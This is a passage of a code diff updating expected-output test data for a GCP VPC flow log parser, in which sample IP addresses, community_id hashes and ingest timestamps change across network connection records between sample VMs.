"{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.843986502Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -4275,9 +4275,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65316, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -4291,7 +4291,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:inMMyMxBckhL35Xh3+nNKgSc4qA=", + "community_id": "1:dJhBeC2A7KY1uJpWS48QzGUUwxY=", "bytes": 102119, "transport": "tcp", "type": "ipv4", @@ -4306,7 +4306,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -4330,8 +4330,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868566700Z", - "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391385Z", + "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565831992Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -4358,18 +4358,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.101", + "address": "67.43.156.13", "port": 49680, "bytes": 1541638, "domain": "siem-windows", - "ip": "203.0.113.101", + "ip": "67.43.156.13", "packets": 949 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:o9OoB7tVAGCzWrss+96PmO6N0FI=", + "community_id": "1:cHKWt/bhFFzMhXHYkr/P9HZG8V0=", "bytes": 1541638, "name": "windows-isolated", "transport": "tcp", @@ -4391,7 +4391,7 @@ }, "related": { "ip": [ - "203.0.113.101", + "67.43.156.13", "10.139.99.242" ] }, @@ -4428,8 +4428,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868570Z", - "original": "{\"insertId\":\"1ulp77rfdvho5p\",\"jsonPayload\":{\"bytes_sent\":\"1541638\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.101\",\"src_port\":49680},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"949\",\"reporter\":\"DEST\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391390400Z", + "original": "{\"insertId\":\"1ulp77rfdvho5p\",\"jsonPayload\":{\"bytes_sent\":\"1541638\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49680},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"949\",\"reporter\":\"DEST\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", "end": "2019-06-14T03:49:55.705469925Z", @@ -4456,18 +4456,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60112, "bytes": 755901, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 227 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:h6NgISKzvTiBXyH4aX48ebaiTiY=", + "community_id": "1:tEFDnW0zs/Y86QZ+V6iUmdJfre4=", "bytes": 755901, "name": "default", "transport": "tcp", @@ -4489,7 +4489,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, @@ -4526,8 +4526,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868573300Z", - "original": "{\"insertId\":\"1ulp77rfdvho4y\",\"jsonPayload\":{\"bytes_sent\":\"755901\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60112},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"227\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391396100Z", + "original": "{\"insertId\":\"1ulp77rfdvho4y\",\"jsonPayload\":{\"bytes_sent\":\"755901\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60112},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"227\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", "end": "2019-06-14T03:49:18.224268993Z", @@ -4548,10 +4548,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33558, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -4565,7 +4565,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dH+LewCyUH2MeBfvw4hfqQCcruA=", + "community_id": "1:OXveH9jdApjuJYvfxS0cJZ8eAbI=", "bytes": 248715, "name": "default", "transport": "tcp", @@ -4588,7 +4588,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -4624,8 +4624,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868576700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4o\",\"jsonPayload\":{\"bytes_sent\":\"248715\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.394676451Z\",\"packets_sent\":\"270\",\"reporter\":\"SRC\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391401600Z", + "original": "{\"insertId\":\"1ulp77rfdvho4o\",\"jsonPayload\":{\"bytes_sent\":\"248715\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.394676451Z\",\"packets_sent\":\"270\",\"reporter\":\"SRC\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:58.492572765Z", "end": "2019-06-14T03:49:56.394676451Z", @@ -4654,17 +4654,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65316, "bytes": 69757, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 709 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:inMMyMxBckhL35Xh3+nNKgSc4qA=", + "community_id": "1:dJhBeC2A7KY1uJpWS48QzGUUwxY=", "bytes": 69757, "transport": "tcp", "type": "ipv4", @@ -4678,7 +4678,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -4703,8 +4703,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868581Z", - "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391407100Z", + "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565831992Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -4733,17 +4733,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65263, "bytes": 69440, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 728 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:z1VfQro/CzS/3/Jcw7ACjDX47kM=", + "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", "bytes": 69440, "transport": "tcp", "type": "ipv4", @@ -4757,7 +4757,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -4782,8 +4782,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868584200Z", - "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391412500Z", + "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270990648Z", "end": "2019-06-14T03:49:56.220748025Z", @@ -4810,17 +4810,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50438, "bytes": 1457, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:W4ijXBQBwNbGcf7z2YuONE7/Z8I=", + "community_id": "1:+C/3qZp81mU+xJgorNlBHR/BmTE=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -4834,7 +4834,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -4859,8 +4859,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868588Z", - "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391417900Z", + "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.454046087Z", "end": "2019-06-14T03:40:20.569744903Z", @@ -4881,9 +4881,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50438, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -4897,7 +4897,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:W4ijXBQBwNbGcf7z2YuONE7/Z8I=", + "community_id": "1:+C/3qZp81mU+xJgorNlBHR/BmTE=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -4912,7 +4912,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -4936,8 +4936,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868591300Z", - "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391423500Z", + "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.454046087Z", "end": 